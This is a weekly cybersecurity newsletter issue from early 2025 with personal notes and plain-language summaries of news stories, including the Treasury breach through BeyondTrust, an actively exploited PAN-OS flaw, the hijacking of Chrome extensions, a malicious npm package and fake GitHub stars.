Read Time: 8 minutes

Howdy friends!

Happy 2025! What a start to the year already, didn’t even get a minute of slow news. I’m not sure about you all but I’m watching all these attacks closely as they seem linked. Makes me worries we haven’t seen the last of it.

Hope you all were able to avoid the sicknesses that my house was collecting like Pokemon cards.

ICYMI

🖊️ Something I wrote: When Rest Feels Like a Risk

🎧️ Something I heard: Every time I throw in a song in this slot people tell me they dig that I did that. Wasn’t doing much podcasts lately anyway, so here is a song that I recently added to my constant rotation playlist.

🎤 Something I said: A look back on my top video of 2024. Crazy one wasn’t it? A bunch of you reached out and said that’s how you found me. Well thanks for sticking around.

🔖 Something I read: I’ll be honest, I’ve sunk a disgusting amount of hours into Wind and Truth and I’m just over halfway through. - But I also dug way into some of the stories this week as they’re nuts. Especailly this one - U.S. Army Soldier Arrested in AT&T, Verizon Extortions

Vulnerable News

U.S. Treasury Department Hit by Chinese APT in 'Major' Cyberattack

The Treasury Department got hit by Chinese APT actors earlier this month. The attackers managed to snag a key from BeyondTrust (their remote support provider) and used it to access Treasury workstations and some unclassified documents. BeyondTrust first spotted something fishy on December 2nd, confirmed the API key compromise on the 5th, and notified Treasury on the 8th.

This is part of a broader pattern of Chinese espionage campaigns hitting U.S. government targets - remember that Salt Typhoon telecom breach that exposed communications of government officials? (read more)

Chinese hackers targeted sanctions office in Treasury attack

In a follow up to the top story, it came to light that Chinese hackers hit the Treasury's sanctions office - you know, the folks who decide which Chinese companies and individuals get the financial timeout. The Treasury's calling it a "major cybersecurity incident" but claims the attackers are now locked out. (read more)

U.S. Government Sanctions IRGC and GRU Affiliates for Attempted Election Interference

It’s a U.S. Treasury kind of news day. They just dropped some new sanctions on Iran and Russia's election meddling crews. They're targeting the IRGC's Cognitive Design Production Center and a GRU-linked outfit called the Center for Geopolitical Expertise. The Russian group, founded by previously-sanctioned Aleksandr Dugin, has been busy with deepfakes and running about 100 fake news sites, complete with their own AI server setup.

We're seeing full AI infrastructure and massive networks of convincing fake news sites. The GRU's even paying rent for an apartment to house their server farm. While these OFAC designations basically lock these groups out of the U.S. financial system, let's be real - they're probably not too worried about accessing their Chase accounts right now. (read more)

Palo Alto Networks: Threat Actors Targeting PAN-OS Flaw

There's an active exploitation happening against Palo Alto Networks firewalls right now. The bug (CVE-2024-3393) lets unauthenticated attackers send malicious packets that can force firewalls into maintenance mode through repeated reboots. DNS Security logging needs to be enabled to be vulnerable, but that's a pretty common config.

PAN's already patched this in the latest versions (10.1.14-h8, 10.2.10-h12, 11.1.5, 11.2.3 and up), and Prisma Access fixes are coming in early January. If you can't patch right away, they're suggesting some workarounds like disabling DNS Security logging. While they're not sharing actual victim numbers, the fact that they rushed out an advisory during the holidays signals seriousness to me. (read more)

New details reveal how hackers hijacked 35 Google Chrome extensions

We covered this story last week about how CyberHaven had their Chrome extension hijacked. Well turns out they weren’t alone.

They’re targeting the Chrome extension campaigns with a massive OAuth phishing campaign. The attackers sent fake policy violation notices that led to a legit-looking Google OAuth page asking for Chrome Web Store permissions. Once granted, they modified at least 35 extensions (hitting around 2.6M users) to steal Facebook business account data. MFA didn't help since OAuth flows bypass it entirely.

What's particularly interesting is the scale and preparation here - they pre-registered domains for extensions they were planning to target as far back as March 2024. The malicious code they injected was specifically after Facebook business accounts, looking to grab everything from access tokens to QR codes used in 2FA. Classic case of targeting the supply chain to hit the real prize - Facebook ad accounts with payment methods attached. (read more)

Elon Musk Uses Cybertruck Explosion to Show Tesla Can Remotely Unlock and Monitor Vehicles

Well this is a fun reminder that your Tesla data isn't really yours. After the Cybertruck explosion in Vegas, Elon showed off Tesla's capabilities by remotely unlocking the vehicle for law enforcement and handing over video from charging stations to track its movements. The sheriff even gave Elon a personal shoutout for the assist.

While helping catch a potential car bomber seems reasonable, it highlights how much control and surveillance capability Tesla (and Elon personally) has over these vehicles. Between remote unlocking, location tracking, worker-accessible cameras, and features locked behind subscriptions, you're basically just renting an expensive surveillance device. As 404 Media points out, these "emergency" capabilities have a funny way of becoming everyday tools - just look at how phone hacking went from terrorism cases to regular police work.

Always be wary if someone is telling you its okay to infringe on your privacy to “save the children” or something else emotional. (read more)

Apple offers to settle 'snooping Siri' lawsuit for an utterly incredible $95M

Apple's getting ready to shell out $95M (so like 17 seconds of revenue?) to settle claims that Siri was being a bit too nosy, recording folks without the magic "Hey Siri" wake words. According to the lawsuit, even something as innocent as the sound of a zipper could trigger Siri to start recording and shipping that audio back to Apple's servers. Some users even claim they got targeted ads based on private conversations - like one person who started seeing ads for meds they'd only discussed with their doctor.

I think we’ve all had this experience.

The settlement could cover anyone who's owned a Siri device since 2011, though with that many potential claimants, don't expect a big payout. For Apple, which pulled in $93.7B in net income last year, this is couch cushion money. Meanwhile, Google's facing similar heat over their Assistant's alleged eavesdropping habits. (read more)

US Arrests Army Soldier Over AT&T, Verizon Hacking

They nabbed another player in the Snowflake hacking saga - a 20-year-old Army communications specialist named Cameron Wagenius. Going by Kiberphant0m online, he allegedly got his hands on some spicy phone records from AT&T and Verizon, including presidential call logs which he leaked to try to extort AT&T. Brian Krebs connected the dots on this one, linking Wagenius to Connor Moucka (aka Judische), who was arrested back in October.

The kid was apparently busy - claimed to have hacked 15+ telecom providers and ran a DDoS botnet. He's the third arrest in the Snowflake campaign, joining Moucka and John Binns (the T-Mobile hacker currently cooling his heels in Turkey). Mom confirmed her son’s extracurricular activities, which probably didn't help his case. (read more)

Malicious Obfuscated NPM Package Disguised as an Ethereum Tool Deploys Quasar RAT

Heads up npm users - there's a package called "ethereumvulncontracthandler" pretending to be an Ethereum security tool that's actually dropping Quasar RAT (Malware). The package has been downloaded 66 times since December 18th and is still up on npm. Socket's (friends of VulnU, awesome team) researchers found it uses all the classic obfuscation tricks - Base64, XOR encoding, and minification to hide its true nature. Once it gets on your system, it checks if it's in a sandbox, then pulls down Quasar RAT from a sketchy domain.

The researchers also dropped an interesting side note about the growing problem of fake GitHub stars being used to promote malware repos. Apparently there's a whole black market where you can buy 1,000 stars for $110. They estimate there are about 4.5 million fake stars across 23,000 repos, mostly promoting sketchy stuff like game cheats and crypto bots. Just another reminder that GitHub stars aren't a great measure of legitimacy these days. (read more)

Over 3.1 million fake "stars" on GitHub projects used to boost rankings

GitHub's got a star problem - researchers just found over 3.1 million fake "stars" being used to boost repository rankings. A team from Socket (didn’t even realize they got two shouts this week), Carnegie Mellon, and NC State built a tool called StarScout that dug through 20TB of GitHub data and found suspicious patterns like bot accounts and coordinated starring activity. The fake stars are being used to promote everything from straight-up malware to just developers trying to make their legit projects look more popular.

What's wild is that this isn't just a few isolated cases - about 15.8% of repos with over 50 stars in July 2024 were involved in these pump up fakes. GitHub's been playing whack-a-mole, removing suspicious accounts and repos as they're reported, but it's clearly an ongoing battle. This just feels like old Internet to me, I kind of love it. (read more)

Cisco Confirms Authenticity of Data After Second Leak

Cisco's having a rough Christmas with IntelBroker dropping another 4GB of their data on December 25th. Cisco's confirming it's legit but insisting there wasn't actually a breach - apparently all this stuff came from a public-facing DevHub that was serving as a resource center. Though they're quick to point out some of those files weren't supposed to be public.

The hacker claimed 800GB, then upped it to 4.5TB of stolen data. While Cisco's maintaining their "no breach" stance, they've quietly removed their earlier statement about no sensitive personal info being compromised - which is, you know, not a great sign. The leaked info includes source code, scripts, and digital certificates, but we'll see if there's more we hear about later. (read more)

Miscellaneous mattjay

Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay